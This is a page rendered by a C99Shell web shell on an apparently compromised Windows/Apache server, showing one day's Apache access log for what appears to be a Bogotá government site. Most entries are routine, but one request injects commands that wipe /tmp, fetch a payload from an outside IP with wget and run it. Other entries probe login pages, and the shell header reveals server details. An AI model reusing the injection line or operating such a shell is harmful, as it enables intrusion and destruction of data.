!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.08.31.log (2.36 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
52.56.104.32 - - [31/Aug/2023:00:00:42 -0500] "GET /+CSCOE+/logon.html HTTP/1.1" 404 1018
40.77.167.19 - - [31/Aug/2023:00:01:08 -0500] "GET /BLA/resoluciones/AUTOS%202022/2000.pdf HTTP/1.1" 304 -
216.245.221.92 - - [31/Aug/2023:00:01:50 -0500] "HEAD / HTTP/1.1" 200 -
52.56.104.32 - - [31/Aug/2023:00:02:37 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [31/Aug/2023:00:02:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:03:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:02:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.192 - - [31/Aug/2023:00:04:07 -0500] "GET /1-7-millones-de-personas-participaron-activamente-en-el-simulacro-distrital-de-evacuacion.html HTTP/1.1" 304 -
52.56.104.32 - - [31/Aug/2023:00:04:51 -0500] "GET /cgi-bin/login.cgi HTTP/1.1" 404 1018
172.22.2.4 - - [31/Aug/2023:00:03:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58981
201.245.192.253 - - [31/Aug/2023:00:04:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.19 - - [31/Aug/2023:00:05:45 -0500] "GET /derechos-humanos-eje-fundamental-en-la-toma-de-decisiones-en-la-emergencia-climatica.html HTTP/1.1" 200 948
216.245.221.92 - - [31/Aug/2023:00:06:50 -0500] "HEAD / HTTP/1.1" 200 -
52.56.104.32 - - [31/Aug/2023:00:06:53 -0500] "\x16\x03\x01" 400 226
201.113.32.144 - - [31/Aug/2023:00:06:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3093.pdf HTTP/1.1" 200 292489
201.113.32.144 - - [31/Aug/2023:00:07:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
121.238.90.32 - - [31/Aug/2023:00:07:09 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+37.44.238.213/nekoY/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
209.97.182.84 - - [31/Aug/2023:00:08:44 -0500] "\x16\x03\x01\x01\xfd\x01" 400 226
52.56.104.32 - - [31/Aug/2023:00:09:08 -0500] "GET / HTTP/1.1" 200 319
186.84.21.183 - - [31/Aug/2023:00:09:25 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 203066
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.84.21.183 - - [31/Aug/2023:00:09:26 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [31/Aug/2023:00:09:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.84.21.183 - - [31/Aug/2023:00:09:40 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 63381
186.84.21.183 - - [31/Aug/2023:00:09:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.84.21.183 - - [31/Aug/2023:00:09:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 163507
186.84.21.183 - - [31/Aug/2023:00:09:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:09:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [31/Aug/2023:00:09:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:08:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:00:08:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48235
201.245.192.253 - - [31/Aug/2023:00:09:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.84.21.183 - - [31/Aug/2023:00:09:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 3332305
186.84.21.183 - - [31/Aug/2023:00:10:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 7744657
172.22.2.4 - - [31/Aug/2023:00:10:06 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
66.249.66.194 - - [31/Aug/2023:00:10:07 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:10:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1790865
172.22.2.4 - - [31/Aug/2023:00:10:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [31/Aug/2023:00:10:15 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [31/Aug/2023:00:10:16 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [31/Aug/2023:00:10:16 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [31/Aug/2023:00:09:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53013
40.77.167.61 - - [31/Aug/2023:00:11:00 -0500] "GET /Publicaciones/2023EE196216.pdf HTTP/1.1" 200 1981571
186.84.21.183 - - [31/Aug/2023:00:11:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 63381
186.84.21.183 - - [31/Aug/2023:00:11:33 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:11:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:11:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.84.21.183 - - [31/Aug/2023:00:11:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:11:35 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:11:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 163622
186.84.21.183 - - [31/Aug/2023:00:11:44 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:11:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.245.221.92 - - [31/Aug/2023:00:11:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:00:12:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 63381
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:12:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:12:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:12:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:12:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.84.21.183 - - [31/Aug/2023:00:12:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:12:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:12:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:12:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:12:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 154612
186.84.21.183 - - [31/Aug/2023:00:12:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:12:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [31/Aug/2023:00:12:15 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
152.61.192.232 - - [31/Aug/2023:00:14:05 -0500] "GET / HTTP/1.1" 200 319
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 63381
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:14:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:14:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:14:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:14:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:14:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56760
186.84.21.183 - - [31/Aug/2023:00:14:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.84.21.183 - - [31/Aug/2023:00:14:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:14:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:14:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:14:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:14:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:14:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.84.21.183 - - [31/Aug/2023:00:14:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 160067
186.84.21.183 - - [31/Aug/2023:00:14:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.183 - - [31/Aug/2023:00:14:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [31/Aug/2023:00:14:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.84.21.183 - - [31/Aug/2023:00:14:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 7018838
186.84.21.183 - - [31/Aug/2023:00:14:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 614155
186.84.21.183 - - [31/Aug/2023:00:15:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1776087
172.22.2.4 - - [31/Aug/2023:00:14:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:00:14:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [31/Aug/2023:00:16:50 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.85 - - [31/Aug/2023:00:17:10 -0500] "GET /portaldeninos/que-es-cambio-climatico/ HTTP/1.1" 200 86727
201.245.192.253 - - [31/Aug/2023:00:17:11 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.87 - - [31/Aug/2023:00:17:12 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
66.249.66.85 - - [31/Aug/2023:00:17:13 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
201.245.192.253 - - [31/Aug/2023:00:17:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:18:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43480
201.245.192.253 - - [31/Aug/2023:00:18:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43193
201.245.192.253 - - [31/Aug/2023:00:19:11 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:19:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:19:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [31/Aug/2023:00:19:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:00:21:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:21:44 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [31/Aug/2023:00:21:45 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%202%20del%205%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 591315
216.245.221.92 - - [31/Aug/2023:00:21:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:00:21:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:20:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
152.61.128.50 - - [31/Aug/2023:00:24:47 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [31/Aug/2023:00:24:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [31/Aug/2023:00:24:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:25:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [31/Aug/2023:00:26:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:00:25:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
